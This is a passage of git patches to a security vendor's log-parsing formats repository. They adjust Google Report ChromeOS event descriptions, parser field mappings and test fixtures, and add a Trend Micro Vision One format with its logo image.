+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Google Report",
         "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
       }
-    },
-    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}"
+    }
   },
   "expected": {
     "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}",

From f2dd3b05166600bb2e7e6a91ba6fc89cbbc6e400 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 15 Nov 2024 16:44:12 +0100
Subject: [PATCH 242/317] Fix smart desc

---
 Google Cloud/google-report/_meta/smart-descriptions.json | 8 +++++++-
 Google Cloud/google-report/ingest/parser.yml             | 2 +-
 2 files changed, 8 insertions(+), 2 deletions(-)

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 82e74ecd7..b58cf816e 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -174,6 +174,13 @@
       {
         "field": "network.application",
         "value": "context_aware_access"
+      },
+      {
+        "field": "google.report.access.application"
+      }
+    ]
+  },
+  {
     "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}",
     "conditions": [
       {
@@ -263,7 +270,6 @@
         "field": "event.action"
       },
       {
-        "field": "google.report.access.application"
         "field": "google.report.saml.application_name"
       }
     ]
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index f3b54b479..f928e2148 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -272,7 +272,7 @@ stages:
           event.type: ["denied"]
           device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'
           google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}'
-          
+
   set_rules_fields:
     actions:
       - set:

From 1e5f81194e4fe8d0f69df8ea7d743b39d35fd469 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Mon, 18 Nov 2024 10:47:49 +0100
Subject: [PATCH 243/317] Fix smart desc

---
 Google Cloud/google-report/_meta/smart-descriptions.json | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index b58cf816e..c1a559ed7 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -177,6 +177,12 @@
       },
       {
         "field": "google.report.access.application"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "event.action"
       }
     ]
   },

From 7478edd763b6ef7828fbc8cbf8e481b7aa1c2b1b Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Mon, 18 Nov 2024 11:27:09 +0100
Subject: [PATCH 244/317] Fix smart desc

---
 .../_meta/smart-descriptions.json             | 22 -------------------
 1 file changed, 22 deletions(-)

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index c1a559ed7..a25527ef8 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -293,9 +293,6 @@
       },
       {
         "field": "user.email"
-      },
-      {
-        "field": "google.report.saml.application_name"
       }
     ]
   },
@@ -334,25 +331,6 @@
       }
     ]
   },
-  {
-    "value": "User {user.email} failed to log in using {network.application} service : {event.reason}",
-    "conditions": [
-      {
-        "field": "network.application",
-        "value": "saml"
-      },
-      {
-        "field": "event.action",
-        "value": "login_failure"
-      },
-      {
-        "field": "user.email"
-      },
-      {
-        "field": "google.report.saml.application_name"
-      }
-    ]
-  },
   {
     "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
     "conditions": [

From 65af5b12298e7c7884511b6f93260bf41fbc2b8b Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Mon, 18 Nov 2024 11:41:54 +0100
Subject: [PATCH 245/317] Add some modification to the parser

---
 .../google-report/_meta/smart-descriptions.json        |  4 ++--
 Google Cloud/google-report/ingest/parser.yml           |  6 ++++--
 .../google-report/tests/test_chrome_sample_1.json      | 10 ++++++++--
 .../google-report/tests/test_chrome_sample_2.json      |  7 ++++---
 4 files changed, 18 insertions(+), 9 deletions(-)

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 0ac5acfe5..0c49ccdf8 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -283,7 +283,7 @@
     ]
   },
   {
-    "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application",
+    "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application",
     "conditions": [
       {
         "field": "network.application",
@@ -297,7 +297,7 @@
         "field": "device.model.name"
       },
       {
-        "field": "device.id"
+        "field": "device.model.identifier"
       }
     ]
   },
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index 2dde85fdb..e15db634e 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -287,9 +287,11 @@ stages:
           event.category: ["web"]
           organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
           event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}'
-          device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
-          device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+          device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
+          host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
           device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+          device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+          host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}'
 
       - set:
           event.type: ["change"]
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json
index e0e145d54..6567eebf1 100644
--- a/Google Cloud/google-report/tests/test_chrome_sample_1.json	
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json	
@@ -28,12 +28,18 @@
       }
     },
     "device": {
-      "id": "0x2",
+      "manufacturer": "Linux Foundation",
       "model": {
-        "identifier": "S5NXNZ00A000000",
+        "identifier": "0x2",
         "name": "2.0 root hub"
       }
     },
+    "host": {
+      "name": "S5NXNZ00A000000",
+      "os": {
+        "full": "ChromeOS 16033.51.0"
+      }
+    },
     "network": {
       "application": "chrome"
     },
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json
index ecbf27de3..990b7f47c 100644
--- a/Google Cloud/google-report/tests/test_chrome_sample_2.json	
+++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json	
@@ -27,9 +27,10 @@
         "id": "C01x7c000"
       }
     },
-    "device": {
-      "model": {
-        "identifier": "S5NXNZ00A000000"
+    "host": {
+      "name": "S5NXNZ00A000000",
+      "os": {
+        "full": "ChromeOS 16033.51.0"
       }
     },
     "network": {

From 4c329f6eb9002b66e9c6bef52e60f7c1c340ecf0 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Mon, 18 Nov 2024 12:27:34 +0100
Subject: [PATCH 246/317] Fix smart desc

---
 .../_meta/smart-descriptions.json             | 32 +++++++++++++++++--
 1 file changed, 30 insertions(+), 2 deletions(-)

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 66d518071..81622bd9b 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -352,7 +352,7 @@
     ]
   },
   {
-    "value": "The user on device model {device.model.name} logged out due to {event.reason}",
+    "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}",
     "conditions": [
       {
         "field": "network.application",
@@ -367,11 +367,14 @@
       },
       {
         "field": "device.model.name"
+      },
+      {
+        "field": "user.id"
       }
     ]
   },
   {
-    "value": "The user on device model {device.model.name} log in due to {event.reason}",
+    "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}",
     "conditions": [
       {
         "field": "network.application",
@@ -386,6 +389,31 @@
       },
       {
         "field": "device.model.name"
+      },
+      {
+        "field": "user.id"
+      }
+    ]
+  },
+  {
+    "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "chrome"
+      },
+      {
+        "field": "event.action",
+        "value": "CHROME_OS_LOGIN_EVENT"
+      },
+      {
+        "field": "event.reason"
+      },
+      {
+        "field": "device.model.name"
+      },
+      {
+        "field": "user.id"
       }
     ]
   },

From 90a003cc629a1666e04ae08bd97a170fb0c27cfe Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 19 Nov 2024 09:48:10 +0200
Subject: [PATCH 247/317] Add format for Trend Micro Vision One

---
 .../trend-micro-vision-one/CHANGELOG.md       |   8 ++
 .../trend-micro-vision-one/_meta/fields.yml   |  29 +++++++
 .../trend-micro-vision-one/_meta/logo.png     | Bin 0 -> 10452 bytes
 .../trend-micro-vision-one/_meta/manifest.yml |   9 ++
 .../_meta/smart-descriptions.json             |   0
 .../trend-micro-vision-one/ingest/parser.yml  |  79 ++++++++++++++++++
 .../tests/test_process.json                   |  66 +++++++++++++++
 .../tests/test_registry.json                  |  72 ++++++++++++++++
 8 files changed, 263 insertions(+)
 create mode 100644 Trend Micro/trend-micro-vision-one/CHANGELOG.md
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/fields.yml
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/logo.png
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/manifest.yml
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
 create mode 100644 Trend Micro/trend-micro-vision-one/ingest/parser.yml
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_process.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_registry.json

diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/CHANGELOG.md	
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
new file mode 100644
index 000000000..f18d3cb5d
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml	
@@ -0,0 +1,29 @@
+trendmicro.vision_one.alert_id:
+  description: ''
+  name: trendmicro.vision_one.alert_id
+  type: keyword
+
+trendmicro.vision_one.case_id:
+  description: ''
+  name: trendmicro.vision_one.case_id
+  type: keyword
+
+trendmicro.vision_one.incident_id:
+  description: ''
+  name: trendmicro.vision_one.incident_id
+  type: keyword
+
+trendmicro.vision_one.investigation_status:
+  description: ''
+  name: trendmicro.vision_one.investigation_status
+  type: keyword
+
+trendmicro.vision_one.severity:
+  description: ''
+  name: trendmicro.vision_one.severity
+  type: keyword
+
+trendmicro.vision_one.status:
+  description: ''
+  name: trendmicro.vision_one.status
+  type: keyword
diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..e51bb3eb7725123b5278a71034969dfbbd5ca157
GIT binary patch
literal 10452
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
